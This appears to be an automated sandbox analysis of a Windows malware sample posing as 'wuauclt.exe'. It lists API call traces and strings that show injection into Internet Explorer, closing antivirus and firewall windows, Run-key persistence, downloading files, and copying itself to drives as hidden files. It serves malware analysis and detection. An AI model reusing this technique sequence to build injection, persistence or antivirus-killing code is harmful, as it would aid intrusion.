403a20 5641->5642 5643 40248c 17 API calls 5641->5643 5643->5641 5645 4037bb 5644->5645 5648 403728 5645->5648 5649 403764 FindWindowA 5648->5649 5650 403737 5648->5650 5649->5442 5649->5443 5650->5649 5654 408550 5650->5654 5729 40854e 5650->5729 5804 408494 InternetGetConnectedState 5650->5804 5655 408558 5654->5655 
[Execution graph residue: the node/edge listing of the rendered control-flow graph does not survive as readable text. Recoverable from it: the main routine calls DeleteFileA and CreateMutexA (four mutexes), registry functions (RegOpenKeyExA/RegQueryValueExA, RegCreateKeyExA/RegSetValueExA, RegOpenKeyA/RegDeleteValueA, RegCloseKey), a process-enumeration loop (CreateToolhelp32Snapshot, Process32First, Process32Next, OpenProcess, TerminateProcess), a window-enumeration loop (GetDesktopWindow, FindWindowExA, GetWindowTextA, FindWindowA, PostMessageA) and then five CreateThread calls; the thread routines and their callees use Sleep, InternetGetConnectedState, URLDownloadToFileA, DeleteUrlCacheEntry, CopyFileA, SetFileAttributesA, DeleteFileA, ShellExecuteA, WinExec, GetVersionExA, GetSystemDirectoryA, GetEnvironmentVariableA, SHGetSpecialFolderLocation, SHGetPathFromIDList, FindFirstFileA, FileTimeToLocalFileTime, FileTimeToDosDateTime and SendMessageA. A separate loader stub at 0x4381fa uses VirtualAlloc, VirtualFree, VirtualProtect and LoadLibraryA, and a second one at 0x439c35 uses VirtualAlloc and LoadLibraryA.]
                                                                            APIs
                                                                              • Part of subcall function 023118A1: GetVersionExA.KERNEL32(?), ref: 023118BB
                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 02311BE9
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CD0
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CDE
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CEC
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311CFA
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D08
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D16
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D24
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D32
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D40
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D4E
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D5C
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D6A
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D78
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D86
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311D94
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DA2
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DB0
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DBE
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DCC
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DDA
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DE8
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311DF6
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E04
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E12
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E20
                                                                            • LoadLibraryA.KERNEL32(Wininet.dll), ref: 02311E32
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311E48
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E58
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E68
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E78
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E88
                                                                            • GetProcAddress.KERNEL32(?), ref: 02311E98
                                                                            • LoadLibraryA.KERNEL32(Urlmon.dll), ref: 02311EA4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311EB5
                                                                            • LoadLibraryA.KERNEL32(Psapi.dll), ref: 02311EC4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311ED3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311EE1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02311EEF
                                                                            • OpenProcess.KERNEL32(0000042A,00000000,00000000), ref: 02311FC0
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000084,00000000,00000000,?,?), ref: 02312047
                                                                            • GetInputState.USER32 ref: 02312055
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0231205E
                                                                            • PostThreadMessageA.USER32(00000000), ref: 02312065
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02312075
                                                                            • ReadProcessMemory.KERNEL32(?,?,023122C8,00000032,?), ref: 0231208C
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,311C5C2D,00001000,00000040), ref: 023120BF
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,311C5C2D,?), ref: 023120ED
                                                                            • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 023120FD
                                                                            • WriteProcessMemory.KERNEL32(?,00000001,?,00000004,?), ref: 02312158
                                                                            • WriteProcessMemory.KERNEL32(?,-00000006,?,00000004,?), ref: 0231216B
                                                                            • WriteProcessMemory.KERNEL32(?,02311C1B,02312358,00000004,?), ref: 02312189
                                                                            • VirtualProtectEx.KERNEL32(?,?,00000032,00000040,?), ref: 023121B7
                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000032,?), ref: 023121D0
                                                                            • WriteProcessMemory.KERNEL32(?,?,0231235C,00000004,?), ref: 023121F0
                                                                            • ResumeThread.KERNEL32(?), ref: 023121FA
                                                                            • GetInputState.USER32 ref: 02312200
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02312209
                                                                            • PostThreadMessageA.USER32(00000000), ref: 02312210
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02312220
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02312236
                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,02311C1A,00000000,00000000,?), ref: 02312252
                                                                            • SetThreadPriority.KERNEL32(00000000,00000002), ref: 02312268
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02312271
                                                                            • VirtualFreeEx.KERNEL32(?,02311C0A,00000000,00008000), ref: 02312283
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02312290
                                                                            • CloseHandle.KERNEL32(?), ref: 02312295
                                                                            • CloseHandle.KERNEL32(?), ref: 0231229A
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: true
                                                                            • Associated: 0000002A.00000003.2171747503.0000000002310000.00000004.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2310000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Process$MemoryThread$Write$LibraryLoadMessageVirtual$CloseHandle$CreateCurrentFreeInputObjectPostSingleStateWait$AllocOpenPriorityProtectReadRemoteResumeVersion
                                                                            • String ID: 2$IEXPLORE.EXE$Kernel32.dll$Psapi.dll$Urlmon.dll$Wininet.dll$_Y
                                                                            • API String ID: 742397454-3370953745
                                                                            • Opcode ID: ffe0814801545598d6a796352840efc2063bf2a0fe0169612c762953d40305a9
                                                                            • Instruction ID: a695b7dba6a94ac0ca65fa43ccaf07c7f710757af0986b75b797e07ed4d9ee69
                                                                            • Opcode Fuzzy Hash: ffe0814801545598d6a796352840efc2063bf2a0fe0169612c762953d40305a9
                                                                            • Instruction Fuzzy Hash: 871209B5D40258AFDB159FA5DC44EEFBFBDFB48750F00491AEA48A2210D7318A61DF60
                                                                            APIs
                                                                            • FindWindowA.USER32(IEFrame,00000000), ref: 0040559A
                                                                            • EnumChildWindows.USER32(?,Function_000053F8), ref: 004055AE
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FindWindow$ChildEnumWindows
                                                                            • String ID: IEFrame
                                                                            • API String ID: 761535084-2708574431
                                                                            • Opcode ID: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction ID: 9fa48d5c06d7a0159174ceea0a4e608dfe463db216e6cfd13e307e5669a667bf
                                                                            • Opcode Fuzzy Hash: 4df47bb9bfd133a365dc7414d364b90dfc5f5430ccf501699f06f4521e5fb497
                                                                            • Instruction Fuzzy Hash: CDE0E2E1380B0232E62020E60C83F2B20498B64B68F20103ABE14B82CAFDFDA814152E
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CA7
                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CB2
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00404CCB
                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00404CDC
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                            • String ID:
                                                                            • API String ID: 2659516521-0
                                                                            • Opcode ID: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction ID: 5eb690258a486c73d36cab68f814cc2b6737afb4a969db669cbaf41a67b5cd0e
                                                                            • Opcode Fuzzy Hash: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction Fuzzy Hash: F0F0A4B5D0520C66CB10EAE68D859CF73AC5F45314F5006F7B615F21D1E738DB444754
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00404AAA
                                                                            • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00404ABE
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction ID: 6d0fe3e5f2a624f7a99d633fdd4a9b0fdd2fbeae9b853d00227d1a052b52fcf1
                                                                            • Opcode Fuzzy Hash: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction Fuzzy Hash: 68E046B13442086BCB00DEAA8CC1E5BB3DDABC8214F50C12ABA08D7285D574E8018AA9

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00406FA4
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FB1
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00406FBC
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00406FE8
                                                                            • GetDesktopWindow.USER32 ref: 00406FF1
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FFE
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407009
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407035
                                                                            • GetDesktopWindow.USER32 ref: 0040703E
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 0040704B
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407056
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407082
                                                                            • GetDesktopWindow.USER32 ref: 0040708B
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407098
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070A3
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 004070CF
                                                                            • GetDesktopWindow.USER32 ref: 004070D8
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 004070E5
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070F0
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040711C
                                                                            • GetDesktopWindow.USER32 ref: 00407125
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407132
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 0040713D
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407169
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 00407179
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 0040718F
                                                                            • PostMessageA.USER32(00000000,TKillqqvir,00000000,00000012), ref: 00407195
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071A1
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071B7
                                                                            • PostMessageA.USER32(00000000,TKqqviru,00000000,00000012), ref: 004071BD
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071CC
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071E5
                                                                            • PostMessageA.USER32(00000000,TApplication,qqav,00000012), ref: 004071EB
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessagePost$DesktopText
                                                                            • String ID: QQAV$QQKav$TApplication$TKillqqvir$TKqqviru$qqav
                                                                            • API String ID: 2345741875-3628034782
                                                                            • Opcode ID: 60e916dd5e1458509275c67092bed66e14a56065459e347c25ee774d8020755b
                                                                            • Instruction ID: f35ba248066b91e113d1cf3b3e48b889a6c1fe840748cfa81e74fa6914067d70
                                                                            • Opcode Fuzzy Hash: 60e916dd5e1458509275c67092bed66e14a56065459e347c25ee774d8020755b
                                                                            • Instruction Fuzzy Hash: 7C610DB0B8434466E620B6B24D83F5E656D9F94B08F20617FBF00BA2C3D9BCAD11456D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction ID: 6a7de7b5178300d5e0790259bd21792f98359187be932f6565a32f3e00f96a55
                                                                            • Opcode Fuzzy Hash: c7e4ef307231b5727f18d737f42bfdf77d138b8471ae12336459b4f4e1b329ba
                                                                            • Instruction Fuzzy Hash: 175143B07442056BD700F7A69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction ID: 3c3994bb7e487e018b31e22462f638a3ed2aa8583c797724152dc9debaa7126f
                                                                            • Opcode Fuzzy Hash: b86f05e999e844c495e0e50c26fabb8c117fd4a697973720332456d8ac770a48
                                                                            • Instruction Fuzzy Hash: BA5141B07442056BD700FBA69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405970
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725,?,00000000,?,00407FF7,00000001,00000000), ref: 00405982
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
                                                                            • GetEnvironmentVariableA.KERNEL32(ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000), ref: 00405A2E
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405A3B
                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00405A4B
                                                                              • Part of subcall function 00404D04: GetVersionExA.KERNEL32(?,?,004072CF,00000000,0040775D,?,00000003,00000000,00000000), ref: 00404D15
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405C3C
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C4E
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DownloadEnvironmentFolderFromListLocationPathSpecialVariableVersion
                                                                            • String ID: MfimBljf9$MfimMkbf|86$ProgramFiles$XLhwawhfp%C{tiiqaw(vvi$XLhwawhfp%C{tiiqawZja}vokwc-a}c$_LhwawhfpVnlvqevpX$llc-p}r$lqrs>*)nwb(wimg`o`t-gjk,m`(w|q$qwj>
                                                                            • API String ID: 1888836333-1695214238
                                                                            • Opcode ID: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction ID: a5c779206b19b53d33bbc18893a0be02a82dcc92b5c72ba9f95bed763f7d3347
                                                                            • Opcode Fuzzy Hash: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction Fuzzy Hash: D09103746012099BD710FB65DD4AA8E77B8EF84308F1040BBB504BB2E3DA78AE418F5D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406468
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 0040648B
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064A9
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064C7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A), ref: 004064EB
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040651C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 004065F8
